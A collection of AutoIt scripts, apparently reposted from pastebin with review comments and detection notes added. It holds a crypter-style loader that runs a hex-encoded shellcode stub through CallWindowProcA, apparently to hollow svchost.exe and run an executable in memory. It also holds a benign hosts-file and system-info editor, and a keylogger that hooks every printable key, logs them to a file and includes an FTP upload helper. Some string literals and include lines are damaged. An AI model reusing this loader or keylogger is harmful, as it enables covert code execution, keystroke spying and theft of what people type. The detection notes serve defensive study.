
RunExeFromMemory.au3

This script demonstrates execution from memory, a technique used in many crypters.
http://pastebin.com/7qrhYzcj
________________________________________
; Ask the operator for an .exe on disk. The dialog text is Spanish:
; "Choose your server to run in memory" / "exe files".
Local $sBinary = FileOpenDialog("Elija tu Servidor para Ejecutar en la Memoria", "", "Archivos exe (*.exe)")

; Read the whole file and pass its contents to RunExeFromMemory.
; NOTE(review): Call() receives RunExeFromMemory's return value rather than a
; function name; the work is done while that argument is evaluated.
Call ( RunExeFromMemory(Fileread($sBinary)))





; Stages two buffers inside this process and then transfers execution to the
; first one through user32!CallWindowProcA (see CWPA).
;   $Binary - contents of the file selected at the top of the script.
; $Memory receives the decoded stub from sShellCode(); $FileBuffer receives a
; copy of $Binary. Both are declared Global because sStructBuffer() and
; sStructBin() read them.
; NOTE(review): the stub is opaque here. The svchost.exe path is handed to it as
; a string argument, so it presumably starts that program as a host for the
; buffered file (RunPE / process hollowing) - confirm by analysing the stub.
; Detection notes: a script interpreter calling CallWindowProcA with a pointer
; into its own data, and an svchost.exe started by a user process instead of
; services.exe, are the observable behaviours.
Func RunExeFromMemory($Binary)

    Global $Memory ,  $FileBuffer

    ; Each structure is sized to the byte length reported by sReadBytes().
    $Memory = DllStructCreate("Boolean[" & sReadBytes(sShellCode()) & "]")
    $FileBuffer = DllStructCreate("Boolean[" & sReadBytes($Binary) & "]")
    DllStructSetData($Memory, 1, sShellRead(sShellCode()))
    DllStructSetData($FileBuffer, 1, $Binary)

    ; Arguments: pointer to the stub, host program path, pointer to the file copy.
    Call ( CWPA( sStructBuffer(), sInjectMyApp(), sStructBin(), False, False ))

EndFunc




; Returns the address of the global $Memory structure created in
; RunExeFromMemory (the buffer that holds the decoded stub).
Func sStructBuffer()

    Local $Ret = DllStructGetPtr($Memory)
    Return $Ret

EndFunc




; Returns the address of the global $FileBuffer structure created in
; RunExeFromMemory (the in-memory copy of the selected file).
Func sStructBin()

    Local $Ret2 = DllStructGetPtr($FileBuffer)
    Return $Ret2

EndFunc





; Thin wrapper around user32!CallWindowProcA.
; CallWindowProc invokes the address given as its first argument with the
; remaining four arguments. The caller in this file passes a pointer to a data
; buffer there, not a window procedure, so the API is used only as a way to
; jump to that buffer.
;   $lpPrevWndFunc - address to be called (passed as "ptr")
;   $hWnd          - passed as a wide string ("wstr")
;   $Msg           - passed as "ptr"
;   $wParam/$lParam- passed as "int"
; The DllCall result is stored in $Return but never returned to the caller.
Func CWPA($lpPrevWndFunc, $hWnd, $Msg, $wParam, $lParam)

    Local $Return
    $Return = DllCall("User32", "none", "CallWindowProcA", "ptr", $lpPrevWndFunc, "wstr", $hWnd, "ptr", $Msg, "int", $wParam, "int", $lParam)

EndFunc






; Returns the full path of svchost.exe in the system directory. The caller
; passes this string to the stub as its second argument.
; Detection note: the path itself is legitimate; what stands out is svchost.exe
; running with an unexpected parent process or without the usual "-k" service
; group on its command line.
Func sInjectMyApp()

    Local $sInject = @SystemDir & "\svchost.exe"
    Return $sInject

EndFunc





Func sShellCode ()

   Local $Buffer
         $Buffer = "0x" & "30783630453834453030303030303642303036353030373230303645303036353030364330303333​30303332303030303030364530303734303036343030364" & _
    "33030364330303030303030303030303030303030303030303030303030303030303030303030303​030303030303030303030303030303030303030303030303030303030303030303030" & _
    "30303030303030303030303030303030303030303030303030303030303030303542384246433641​343245384242303330303030384235343234323838393131384235343234324336413" & _
    "34545384141303330303030383931313641344145384131303330303030383933393641314536413​343453839443033303030303641323236384634303030303030453839313033303030" & _
    "30364132363641323445383838303330303030364132413641343045383746303330303030364132​453641304345383736303330303030364133323638433830303030303045383641303" & _
    "33030303036413241453835433033303030303842303943373031343430303030303036413132453​834443033303030303638354245383134434635314538373930333030303036413345" & _
    "45383342303330303030384244313641314545383332303330303030364134304646333246463331​464644303641313245383233303330303030363835424538313443463531453834463" & _
    "03330303030364131454538313130333030303038423039384235313343364133454538303530333​030303038423339303346413641323245384641303230303030384230393638463830" & _
    "30303030303537353146464430364130304538453830323030303036383838464542333136353145​383134303330303030364132454538443630323030303038423339364132414538434" & _
    "43032303030303842313136413432453843343032303030303537353236413030364130303641303​436413030364130303641303036413030464633314646443036413132453841393032" & _
    "30303030363844303337313046323531453844353032303030303641323245383937303230303030​384231313641324545383845303230303030384230394646373233344646333146464" & _
    "43036413030453837453032303030303638394339353141364535314538414130323030303036413​232453836433032303030303842313138423339364132454538363130323030303038" & _
    "42303936413430363830303330303030304646373235304646373733344646333146464430364133​364538343730323030303038424431364132324538334530323030303038423339364" & _
    "13345453833353032303030303842333136413232453832433032303030303842303136413245453​832333032303030303842303935324646373735343536464637303334464633313641" & _
    "30304538313030323030303036384131364133444438353145383343303230303030383343343043​464644303641313245384639303130303030363835424538313443463531453832353" & _
    "03230303030364132324538453730313030303038423131383343323036364133414538444230313​030303036413032353235314646443036413336453843453031303030304337303130" & _
    "30303030303030423832383030303030303641333645384243303130303030463732313641314545​384233303130303030384231313842353233433831433246383030303030303033443" & _
    "03641334545383946303130303030303331313641323645383936303130303030364132383532464​633313641313245383841303130303030363835424538313443463531453842363031" & _
    "30303030383343343043464644303641323645383733303130303030384233393842303938423731​313436413345453836353031303030303033333136413236453835433031303030303" & _
    "84230393842353130433641323245383530303130303030384230393033353133343641343645383​434303130303030384243313641324545383342303130303030384230393530464637" & _
    "37313035363532464633313641303045383241303130303030363841313641334444383531453835​363031303030303833433430434646443036413336453831333031303030303842313" & _
    "13833433230313839313136413341453830353031303030303842303933424341304638353333464​646464646364133324538463430303030303038423039433730313037303030313030" & _
    "36413030453845353030303030303638443243374137363835314538313130313030303036413332​453844333030303030303842313136413245453843413030303030303842303935324" & _
    "64637313034464644303641323245384242303030303030384233393833433733343641333245384​146303030303030384233313842423641343030303030303833433630383641324545" & _
    "38394430303030303038423131364134364538393430303030303035313641303435373536464633​323641303045383836303030303030363841313641334444383531453842323030303" & _
    "03030383343343043464644303641323245383646303030303030384230393842353132383033353​133343641333245383630303030303030384230393831433142303030303030303839" & _
    "31313641303045383446303030303030363844334337413745383531453837423030303030303641​333245383344303030303030384244313641324545383334303030303030384230394" & _
    "64633324646373130344646443036413030453832343030303030303638383833463441394535314​538353030303030303036413245453831323030303030303842303946463731303446" & _
    "46443036413441453830343030303030303842323136314333384243423033344332343034433336​413030453846324646464646463638353443414146393135314538314530303030303" & _
    "03641343036383030313030303030464637343234313836413030464644304646373432343134453​843464646464646463839303138334334313043334538323230303030303036384134" & _
    "34453045454335304538344230303030303038334334303846463734323430344646443046463734​323430383530453833383030303030303833433430384333353535323531353335363" & _
    "53733334330363438423730333038423736304338423736314338423645303838423745323038423​336333834373138373546333830334636423734303738303346344237343032454245" & _
    "37384243353546354535423539354135444333353535323531353335363537384236433234314338​354544373434333842343533433842353432383738303344353842344131383842354" & _
    "13230303344444533333034393842333438423033463533334646333343304643414338344330373​430374331434630443033463845424634334237433234323037354531384235413234" & _
    "30334444363638423043344238423541314330334444384230343842303343353546354535423539​35413544433343333030303030303030"

    Return $Buffer

EndFunc




; Decodes $sData into a string, one byte at a time.
; For every byte position (1 .. sReadBytes($sData)) the byte is extracted with
; BinaryMid, converted to a number by sValue(), and appended as Chr(number).
; Returns the accumulated string.
Func sShellRead($sData)

    Local $sValue

    For $i = 1 To sReadBytes($sData)
        $sValue &= Chr(sValue(BinaryMid($sData , $i , 1)))
    Next

    Return $sValue

EndFunc





; Returns BinaryLen($Data), i.e. the length of $Data in bytes.
Func sReadBytes($Data)

    Local $Value = BinaryLen($Data)
    Return $Value

EndFunc





; Evaluates $Value with Execute() and returns the result as a number.
; NOTE(review): Execute() evaluates its argument as an AutoIt expression. The
; only caller in this file passes single bytes taken from the embedded blob,
; but the function would evaluate any expression it is given.
Func sValue($Value)

    Local $Result = Execute($Value)
    Return Number($Result)

EndFunc

My First Project



This is my very first program :3 Back when I just started to learn about programming, instead of writing a hello world program, I made this :3
http://pastebin.com/3zYGxxLT
_____________________________
#RequireAdmin
#Include
#include
#include
#include

$title = "A.I.X.O.A. v0.1"
$ifilepath = @WindowsDir & "\system32\drivers\etc\hosts"

;GUI
GUICreate( $title , 720, 380,-1,-1)


;hosts file
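; Load the hosts file for the "Important file" tab. Mode 16 opens the file in
; binary mode for reading. When the open fails the editor starts empty; the
; original went on to read from and close the invalid handle.
$Hcontent = ""
$Hfile = FileOpen($ifilepath,16)
If $Hfile = -1 Then
    MsgBox(0, "Error", "Unable to open file.")
Else
    $Hcontent = BinaryToString(FileRead($Hfile))
    FileClose($Hfile)
EndIf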


;Tab greenC8EDCC red2D01EE blueFF0000
; Build the tab control. Controls created after a GUICtrlCreateTabItem call
; belong to that tab, so the order of the statements below matters.
GUICtrlCreateTab(1,5,720,373)
; "CPU" tab: two-column list plus a refresh button.
GUICtrlCreateTabItem("CPU")
$cpuinfo = GUICtrlCreateListView("Description|CPU infomation",10,35,700,300)
$refreshCpu = GUICtrlCreateButton("Refresh",10,340,105,30)
; "Drive" tab: one row per fixed drive.
GUICtrlCreateTabItem("Drive")
$Dinfo = GUICtrlCreateListView("Drive|Drive Name|Free space|Total space|File system|Status|Drive Serial",10,35,700,300)
$refreshDrive = GUICtrlCreateButton("Refresh",10,340,105,30)
; "Important file" tab: a text editor pre-filled with the hosts file, a Save
; button and one button per file that can be selected. The script runs under
; #RequireAdmin, so Save writes to these system files with full privileges.
GUICtrlCreateTabItem("Important file")
$hosts = GUICtrlCreateEdit($Hcontent,10,35,700,300)
$saveH = GUICtrlCreateButton("Save",10,340,105,30)
$hostsfile = GUICtrlCreateButton("Hosts",125,340,105,30)
$winini = GUICtrlCreateButton("Win.ini",240,340,105,30)
$systemini = GUICtrlCreateButton("system.ini",355,340,105,30)
$bootini = GUICtrlCreateButton("boot.ini",470,340,105,30)
; "BIOS" tab: the list is created here but nothing in this script fills it.
GUICtrlCreateTabItem("BIOS")
$BiosList = GUICtrlCreateListView("Description|Basic Input Output System infomation",10,35,700,300)

;tab contents
;cpu tab
; _CPURegistryInfo() fills the global $aCPUInfo array used below.
_CPURegistryInfo()
_GUICtrlListView_DeleteAllItems($cpuinfo)
GUICtrlCreateListViewItem("Name|"& $aCPUInfo[2],$cpuinfo)
GUICtrlCreateListViewItem("# of thread|"& $aCPUInfo[0],$cpuinfo)
; The registry value is in MHz; dividing by 1000 shows it in GHz.
GUICtrlCreateListViewItem("CPU speed|"& Round($aCPUInfo[1]/1000,1) &"Ghz" ,  $cpuinfo)
GUICtrlCreateListViewItem("Identifier|"& $aCPUInfo[3],$cpuinfo)
GUICtrlCreateListViewItem("Vendor|"& $aCPUInfo[4],$cpuinfo)
;drive tab
; _DriveInfo() fills the global $DriveNum / $D* arrays; index 0 of $DriveNum
; holds the number of drives.
_DriveInfo()
_GUICtrlListView_DeleteAllItems($Dinfo)
For $i = 1 to $DriveNum[0]
GUICtrlCreateListViewItem($DriveNum[$i] &"|"& $Dlabel[$i] &"|"& Round($Dfree[$i]/1000,1) &"GB|"& Round($Dtotal[$i]/1000,1) &"GB|"& $Dfs[$i] &"|"& $Dstatus[$i] &"|"& $Dserial[$i],$Dinfo)
Next


; GUI MESSAGE LOOP
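; Show the window and dispatch button events until it is closed.
;
; Changes from the original loop:
;  * Selecting boot.ini / win.ini only changed $ifilepath and left the previous
;    text in the editor, so the next Save overwrote that file with unrelated
;    content (the script runs under #RequireAdmin). Every file button now loads
;    the file first and switches the save target only when the load succeeded.
;  * The "Hosts" button had no handler.
;  * Save opens with mode 2, which truncates the file; the write is now
;    attempted only when the open succeeded.
;  * The Refresh buttons re-query the data instead of re-listing stale values.
GuiSetState()

Do
    $msg = GUIGetMsg()

    Select
        Case $msg = $refreshCpu
            _CPURegistryInfo()
            _GUICtrlListView_DeleteAllItems($cpuinfo)
            GUICtrlCreateListViewItem("Name|"& $aCPUInfo[2],$cpuinfo)
            GUICtrlCreateListViewItem("# of thread|"& $aCPUInfo[0],$cpuinfo)
            GUICtrlCreateListViewItem("CPU speed|"& Round($aCPUInfo[1]/1000,1) &"Ghz" ,  $cpuinfo)
            GUICtrlCreateListViewItem("Identifier|"& $aCPUInfo[3],$cpuinfo)
            GUICtrlCreateListViewItem("Vendor|"& $aCPUInfo[4],$cpuinfo)

        Case $msg = $refreshDrive
            _DriveInfo()
            _GUICtrlListView_DeleteAllItems($Dinfo)
            For $i = 1 to $DriveNum[0]
                GUICtrlCreateListViewItem($DriveNum[$i] &"|"& $Dlabel[$i] &"|"& Round($Dfree[$i]/1000,1) &"GB|"& Round($Dtotal[$i]/1000,1) &"GB|"& $Dfs[$i] &"|"& $Dstatus[$i] &"|"& $Dserial[$i],$Dinfo)
            Next

        Case $msg = $saveH
            $Hfile = FileOpen($ifilepath,2)
            If $Hfile = -1 Then
                MsgBox(0,"Aixoa editor","Save failure")
            Else
                $Hwrite = FileWrite($Hfile,_GUICtrlEdit_GetText($hosts))
                FileClose($Hfile)
                If $Hwrite = 1 Then
                    MsgBox(0,"Aixoa editor","Save successful")
                Else
                    MsgBox(0,"Aixoa editor","Save failure")
                EndIf
            EndIf

        Case $msg = $hostsfile
            _LoadIntoEditor(@WindowsDir & "\system32\drivers\etc\hosts")

        Case $msg = $bootini
            _LoadIntoEditor(StringReplace(@windowsdir,"WINDOWS","") & "boot.ini")

        Case $msg = $systemini
            _LoadIntoEditor(@windowsdir & "\system.ini")

        Case $msg = $winini
            _LoadIntoEditor(@windowsdir & "\win.ini")
    EndSelect

Until    $msg = $GUI_EVENT_CLOSE

; Reads $sPath and shows it in the editor. $ifilepath (the Save target) is
; switched only after the read succeeded, so Save can never write text that
; belongs to a different file.
; Returns 1 on success; on failure returns 0 with @error = 1 and leaves the
; editor and $ifilepath unchanged.
Func _LoadIntoEditor($sPath)
    Local $hIn = FileOpen($sPath, 0)
    If $hIn = -1 Then
        MsgBox(0, "Error", "Unable to open file.")
        Return SetError(1, 0, 0)
    EndIf
    $Hcontent = FileRead($hIn)
    FileClose($hIn)
    $ifilepath = $sPath
    GUICtrlSetData($hosts, $Hcontent)
    Return 1
EndFunc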

;===========================Funtions========================
;       [0] = # of Reported CPU's (can include 'logical' processors as well (# CPU's * # of hyperthreads))
;       [1] = CPU Speed (Mhz)
;       [2] = CPU Name
;       [3] = Identifier (family, model, stepping)
;       [4] = Vendor name
;       [5] = Feature Set (unsure what values are which..)
;   Failure: @error = same as returned by RegEnumKey(), with an empty array ([0] = -1 though)
;       @error = 1 = unable to open requested key
;       @error = 2 = unable to open requested Main key
;       @error = 3 = unable to connect to *remote* registry (not likely a return here)
;       @error = -1 = unable to retrieve requested subkey (key instance out of range)
; ===============================================================================================================================

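; Fills the global $aCPUInfo array (layout described in the header above) from
; the NUMBER_OF_PROCESSORS environment variable and the CentralProcessor\0
; registry key, and returns it.
; The original tested @error after EnvGet() and ignored RegRead() failures,
; although the header documents @error on failure. All values are still read;
; the first RegRead() error code, if any, is reported through @error.
Func _CPURegistryInfo()
    Global $aCPUInfo[6]
    Local Const $sKey = "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0"
    ; Value names in the order of array slots [1]..[5].
    Local $aValueNames[5] = ["~MHz", "ProcessorNameString", "Identifier", "VendorIdentifier", "FeatureSet"]
    Local $iFirstError = 0

    $aCPUInfo[0] = EnvGet("NUMBER_OF_PROCESSORS")

    For $i = 0 To 4
        $aCPUInfo[$i + 1] = RegRead($sKey, $aValueNames[$i])
        If @error And $iFirstError = 0 Then $iFirstError = @error
    Next

    Return SetError($iFirstError, 0, $aCPUInfo)
EndFunc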
;----------------------------------------
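; Collects label, free/total space, file system, status and serial number for
; every fixed drive into the global $DriveNum / $D* arrays. $DriveNum[0] holds
; the number of drives; entry $i of each array describes drive $DriveNum[$i].
; The original used fixed 12-element arrays, which overflow with more than 11
; drives, and indexed the DriveGetDrive() result without checking that the
; call succeeded. The arrays are now sized from the actual drive count and a
; failed query yields a count of 0.
Func _DriveInfo()
    Local $aFixed = DriveGetDrive("fixed")
    If @error Or Not IsArray($aFixed) Then
        Local $aNone[1] = [0]
        $aFixed = $aNone
    EndIf
    Local $iCount = $aFixed[0]

    Global $DriveNum = $aFixed
    Global $Dlabel[$iCount + 1]
    Global $Dfree[$iCount + 1]
    Global $Dtotal[$iCount + 1]
    Global $Dfs[$iCount + 1]
    Global $Dstatus[$iCount + 1]
    Global $Dserial[$iCount + 1]

    For $i = 1 To $iCount
        $Dlabel[$i] = DriveGetLabel($DriveNum[$i])
        $Dfree[$i] = DriveSpaceFree($DriveNum[$i])
        $Dtotal[$i] = DriveSpaceTotal($DriveNum[$i])
        $Dfs[$i] = DriveGetFileSystem($DriveNum[$i])
        $Dstatus[$i] = DriveStatus($DriveNum[$i])
        $Dserial[$i] = DriveGetSerial($DriveNum[$i])
    Next

EndFunc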
;====================================================================
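; Reads the file named by the global $ifilepath into the global $Hcontent.
; The original opened the file with mode 1 (append/write), from which nothing
; can be read, and continued with the invalid handle after a failed open.
; Returns 1 on success; on failure $Hcontent is empty and the function returns
; 0 with @error = 1.
Func _openinifile()
 $Hcontent = ""
 $Hfile = FileOpen($ifilepath,0)
 If $Hfile = -1 Then
    MsgBox(0, "Error", "Unable to open file.")
    Return SetError(1, 0, 0)
 EndIf
 $Hcontent = FileRead($Hfile)
 FileClose($Hfile)
 Return 1
EndFunc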

Keylogger4.au3

http://pastebin.com/mD3z7ycb
 _______________________________
#include
#include
#include
#include
#include

;Keylogger UDF
;Coded by Reverence

; $Save holds the log file path; $Size is declared but not used in the code
; shown here.
Global $Save, $Size

; Placeholder FTP settings read by _FTP_CreateDir further down. Nothing in the
; visible script calls either FTP helper.
$Server = "ServerName"
$Username = "Username"
$Password = "Password"

; Captured characters go to Log.txt on the current user's Desktop - a plain,
; unencrypted file that is easy to look for during triage.
$Save = @DesktopDir & "/" & "Log.txt"
_FileCreate($Save)

; Registers the hotkeys; this call does not return (see _AssignKey).
_AssignKey()

; Registers one hotkey per printable character and binds each to a handler
; that appends that character to the log file.
; The registrations sit inside "While 1", so they are repeated continuously
; and the function never returns.
; Behaviour relevant to detection: HotKeySet registers system-wide hotkeys, so
; a process holding hotkeys for every letter, digit and punctuation key is
; itself an anomaly.
; NOTE(review): the "quot; line below is damaged by page extraction; judging by
; the handler name the original key was presumably "$".
Func _AssignKey()
While 1
HotKeySet("a", "_LogA")
HotKeySet("b", "_LogB")
HotKeySet("c", "_LogC")
HotKeySet("d", "_LogD")
HotKeySet("e", "_LogE")
HotKeySet("f", "_LogF")
HotKeySet("g", "_LogG")
HotKeySet("h", "_LogH")
HotKeySet("i", "_LogI")
HotKeySet("j", "_LogJ")
HotKeySet("k", "_LogK")
HotKeySet("l", "_LogL")
HotKeySet("m", "_LogM")
HotKeySet("n", "_LogN")
HotKeySet("o", "_LogO")
HotKeySet("p", "_LogP")
HotKeySet("q", "_LogQ")
HotKeySet("r", "_LogR")
HotKeySet("s", "_LogS")
HotKeySet("t", "_LogT")
HotKeySet("u", "_LogU")
HotKeySet("v", "_LogV")
HotKeySet("w", "_LogW")
HotKeySet("x", "_LogX")
HotKeySet("y", "_LogY")
HotKeySet("z", "_LogZ")
HotKeySet(" ", "_LogSpace")
HotKeySet(".", "_LogDot")
HotKeySet("'", "_LogApo")
HotKeySet(",", "_LogComma")
HotKeySet(";", "_LogSemCol")
HotKeySet("/", "_LogRightSlash")
HotKeySet("\", "_LogLeftSlash")
HotKeySet("[", "_LogRightBracket")
HotKeySet("]", "_LogLeftBracket")
HotKeySet("1", "_Log1")
HotKeySet("2", "_Log2")
HotKeySet("3", "_Log3")
HotKeySet("4", "_Log4")
HotKeySet("5", "_Log5")
HotKeySet("6", "_Log6")
HotKeySet("7", "_Log7")
HotKeySet("8", "_Log8")
HotKeySet("9", "_Log9")
HotKeySet("0", "_Log0")
HotKeySet("{!}", "_LogEx")
HotKeySet("A", "_LogCaA")
HotKeySet("B", "_LogCaB")
HotKeySet("C", "_LogCaC")
HotKeySet("D", "_LogCaD")
HotKeySet("E", "_LogCaE")
HotKeySet("F", "_LogCaF")
HotKeySet("G", "_LogCaG")
HotKeySet("H", "_LogCaH")
HotKeySet("I", "_LogCaI")
HotKeySet("J", "_LogCaJ")
HotKeySet("K", "_LogCaK")
HotKeySet("L", "_LogCaL")
HotKeySet("M", "_LogCaM")
HotKeySet("N", "_LogCaN")
HotKeySet("O", "_LogCaO")
HotKeySet("P", "_LogCaP")
HotKeySet("Q", "_LogCaQ")
HotKeySet("R", "_LogCaR")
HotKeySet("S", "_LogCaS")
HotKeySet("T", "_LogCaT")
HotKeySet("U", "_LogCaU")
HotKeySet("V", "_LogCaV")
HotKeySet("W", "_LogCaW")
HotKeySet("X", "_LogCaX")
HotKeySet("Y", "_LogCaY")
HotKeySet("Z", "_LogCaZ")
HotKeySet(@CRLF, "_LogEnt")
HotKeySet("{#}", "_LogNum")
HotKeySet("{+}", "_LogPlus")
HotKeySet("^", "_LogUp")
HotKeySet("{{}", "_LogRight")
HotKeySet("{}}", "_LogLeft")
HotKeySet("(", "_LogPa1")
HotKeySet(")", "_LogPa2")
HotKeySet("*", "_LogStar")
HotKeySet("&", "_LogAnd")
HotKeySet("%", "_LogPercent")
HotKeySet("quot;, "_LogDollar")
HotKeySet("@", "_LogAt")
HotKeySet("-", "_LogHyphen")
HotKeySet("_", "_LogUnderscore")
HotKeySet(":", "_LogColon")
HotKeySet(">", "_LogRightArr")
HotKeySet("<", "_LogLeftArr")
HotKeySet("?", "_LogQuesMark")
HotKeySet("`", "_LogWeird")
HotKeySet("~", "_LogSquiggle")
WEnd
EndFunc

; Hotkey handler for "a": appends the character to the log file named by the
; global $Save, then calls _AssignKey again. Every _Log* handler in this script
; has this same two-statement shape and differs only in the character written.
Func _LogA()
FileWrite($Save, "a")
Call("_AssignKey")
EndFunc

Func _LogB()
FileWrite($Save, "b")
Call("_AssignKey")
EndFunc

Func _LogC()
FileWrite($Save, "c")
Call("_AssignKey")
EndFunc

Func _LogD()
FileWrite($Save, "d")
Call("_AssignKey")
EndFunc

Func _LogE()
FileWrite($Save, "e")
Call("_AssignKey")
EndFunc

Func _LogF()
FileWrite($Save, "f")
Call("_AssignKey")
EndFunc

Func _LogG()
FileWrite($Save, "g")
Call("_AssignKey")
EndFunc

Func _LogH()
FileWrite($Save, "h")
Call("_AssignKey")
EndFunc

Func _LogI()
FileWrite($Save, "i")
Call("_AssignKey")
EndFunc

Func _LogJ()
FileWrite($Save, "j")
Call("_AssignKey")
EndFunc

Func _LogK()
FileWrite($Save, "k")
Call("_AssignKey")
EndFunc

Func _LogL()
FileWrite($Save, "l")
Call("_AssignKey")
EndFunc

Func _LogM()
FileWrite($Save, "m")
Call("_AssignKey")
EndFunc

Func _LogN()
FileWrite($Save, "n")
Call("_AssignKey")
EndFunc

Func _LogO()
FileWrite($Save, "o")
Call("_AssignKey")
EndFunc

Func _LogP()
FileWrite($Save, "p")
Call("_AssignKey")
EndFunc

Func _LogQ()
FileWrite($Save, "q")
Call("_AssignKey")
EndFunc

Func _LogR()
FileWrite($Save, "r")
Call("_AssignKey")
EndFunc

Func _LogS()
FileWrite($Save, "s")
Call("_AssignKey")
EndFunc

Func _LogT()
FileWrite($Save, "t")
Call("_AssignKey")
EndFunc

Func _LogU()
FileWrite($Save, "u")
Call("_AssignKey")
EndFunc

Func _LogV()
FileWrite($Save, "v")
Call("_AssignKey")
EndFunc

Func _LogW()
FileWrite($Save, "w")
Call("_AssignKey")
EndFunc

Func _LogX()
FileWrite($Save, "x")
Call("_AssignKey")
EndFunc

Func _LogY()
FileWrite($Save, "y")
Call("_AssignKey")
EndFunc

Func _LogZ()
FileWrite($Save, "z")
Call("_AssignKey")
EndFunc

Func _LogSpace()
FileWrite($Save, " ")
Call("_AssignKey")
EndFunc

Func _LogDot()
FileWrite($Save, ".")
Call("_AssignKey")
EndFunc

Func _LogApo()
FileWrite($Save, "'")
Call("_AssignKey")
EndFunc

Func _LogComma()
FileWrite($Save, ",")
Call("_AssignKey")
EndFunc

Func _LogSemCol()
FileWrite($Save, ";")
Call("_AssignKey")
EndFunc

Func _LogRightSlash()
FileWrite($Save, "/")
Call("_AssignKey")
EndFunc

Func _LogLeftSlash()
FileWrite($Save, "\")
Call("_AssignKey")
EndFunc

Func _LogRightBracket()
FileWrite($Save, "[")
Call("_AssignKey")
EndFunc

Func _LogLeftBracket()
FileWrite($Save, "]")
Call("_AssignKey")
EndFunc

Func _Log1()
FileWrite($Save, "1")
Call("_AssignKey")
EndFunc

Func _Log2()
FileWrite($Save, "2")
Call("_AssignKey")
EndFunc

Func _Log3()
FileWrite($Save, "3")
Call("_AssignKey")
EndFunc

Func _Log4()
FileWrite($Save, "4")
Call("_AssignKey")
EndFunc

Func _Log5()
FileWrite($Save, "5")
Call("_AssignKey")
EndFunc

Func _Log6()
FileWrite($Save, "6")
Call("_AssignKey")
EndFunc

Func _Log7()
FileWrite($Save, "7")
Call("_AssignKey")
EndFunc

Func _Log8()
FileWrite($Save, "8")
Call("_AssignKey")
EndFunc

Func _Log9()
FileWrite($Save, "9")
Call("_AssignKey")
EndFunc

Func _Log0()
FileWrite($Save, "0")
Call("_AssignKey")
EndFunc

Func _LogEx()
FileWrite($Save, "!")
Call("_AssignKey")
EndFunc

Func _LogCaA()
FileWrite($Save, "A")
Call("_AssignKey")
EndFunc

Func _LogCaB()
FileWrite($Save, "B")
Call("_AssignKey")
EndFunc

Func _LogCaC()
FileWrite($Save, "C")
Call("_AssignKey")
EndFunc

Func _LogCaD()
FileWrite($Save, "D")
Call("_AssignKey")
EndFunc

Func _LogCaE()
FileWrite($Save, "E")
Call("_AssignKey")
EndFunc

Func _LogCaF()
FileWrite($Save, "F")
Call("_AssignKey")
EndFunc

Func _LogCaG()
FileWrite($Save, "G")
Call("_AssignKey")
EndFunc

Func _LogCaH()
FileWrite($Save, "H")
Call("_AssignKey")
EndFunc

Func _LogCaI()
FileWrite($Save, "I")
Call("_AssignKey")
EndFunc

Func _LogCaJ()
FileWrite($Save, "J")
Call("_AssignKey")
EndFunc

Func _LogCaK()
FileWrite($Save, "K")
Call("_AssignKey")
EndFunc

Func _LogCaL()
FileWrite($Save, "L")
Call("_AssignKey")
EndFunc

Func _LogCaM()
FileWrite($Save, "M")
Call("_AssignKey")
EndFunc

Func _LogCaN()
FileWrite($Save, "N")
Call("_AssignKey")
EndFunc

Func _LogCaO()
FileWrite($Save, "O")
Call("_AssignKey")
EndFunc

Func _LogCaP()
FileWrite($Save, "P")
Call("_AssignKey")
EndFunc

Func _LogCaQ()
FileWrite($Save, "Q")
Call("_AssignKey")
EndFunc

Func _LogCaR()
FileWrite($Save, "R")
Call("_AssignKey")
EndFunc

Func _LogCaS()
FileWrite($Save, "S")
Call("_AssignKey")
EndFunc

Func _LogCaT()
FileWrite($Save, "T")
Call("_AssignKey")
EndFunc

Func _LogCaU()
FileWrite($Save, "U")
Call("_AssignKey")
EndFunc

Func _LogCaV()
FileWrite($Save, "V")
Call("_AssignKey")
EndFunc

Func _LogCaW()
FileWrite($Save, "W")
Call("_AssignKey")
EndFunc

Func _LogCaX()
FileWrite($Save, "X")
Call("_AssignKey")
EndFunc

Func _LogCaY()
FileWrite($Save, "Y")
Call("_AssignKey")
EndFunc

Func _LogCaZ()
FileWrite($Save, "Z")
Call("_AssignKey")
EndFunc

Func _LogEnt()
FileWrite($Save, @CRLF)
Call("_AssignKey")
EndFunc

Func _LogNum()
FileWrite($Save, "#")
Call("_AssignKey")
EndFunc

Func _LogPlus()
FileWrite($Save, "+")
Call("_AssignKey")
EndFunc

Func _LogUp()
FileWrite($Save, "^")
Call("_AssignKey")
EndFunc

Func _LogRight()
FileWrite($Save, "{")
Call("_AssignKey")
EndFunc

Func _LogLeft()
FileWrite($Save, "}")
Call("_AssignKey")
EndFunc

Func _LogPa1()
FileWrite($Save, "(")
Call("_AssignKey")
EndFunc

Func _LogPa2()
FileWrite($Save, ")")
Call("_AssignKey")
EndFunc

Func _LogStar()
FileWrite($Save, "*")
Call("_AssignKey")
EndFunc

Func _LogAnd()
FileWrite($Save, "&")
Call("_AssignKey")
EndFunc

Func _LogPercent()
FileWrite($Save, "%")
Call("_AssignKey")
EndFunc

; Hotkey handler that follows the same pattern as the other _Log* functions.
; NOTE(review): the string literal below is damaged by page extraction and is
; not valid AutoIt as shown; from the function name the original character was
; presumably "$".
Func _LogDollar()
FileWrite($Save, "quot;)
Call("_AssignKey")
EndFunc

Func _LogAt()
FileWrite($Save, "@")
Call("_AssignKey")
EndFunc

Func _LogHyphen()
FileWrite($Save, "-")
Call("_AssignKey")
EndFunc

Func _LogUnderscore()
FileWrite($Save, "_")
Call("_AssignKey")
EndFunc

Func _LogQuesMark()
FileWrite($Save, "?")
Call("_AssignKey")
EndFunc

Func _LogRightArr()
FileWrite($Save, ">")
Call("_AssignKey")
EndFunc

Func _LogLeftArr()
FileWrite($Save, "<")
Call("_AssignKey")
EndFunc

Func _LogWeird()
FileWrite($Save, "`")
Call("_AssignKey")
EndFunc

Func _LogSquiggle()
FileWrite($Save, "~")
Call("_AssignKey")
EndFunc

Func _LogColon()
FileWrite($Save, ":")
Call("_AssignKey")
EndFunc

; Uploads $LocFile to $RemFile on an FTP server and closes the session.
;   $Server, $Username, $Password - FTP host and account
;   $LocFile - local path to upload
;   $RemFile - destination name on the server
; The results of _FTP_Open, _FTP_Connect and _FTP_FilePut are not checked.
; FTP carries the credentials and the file in clear text, so both the login and
; the uploaded content are visible to network monitoring.
; Nothing in the visible script calls this function.
Func _FTP_FileSend($Server, $Username, $Password, $LocFile, $RemFile)

$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)

_FTP_FilePut($oConnect, $LocFile, $RemFile)

_FTP_Close($oFTP)

EndFunc

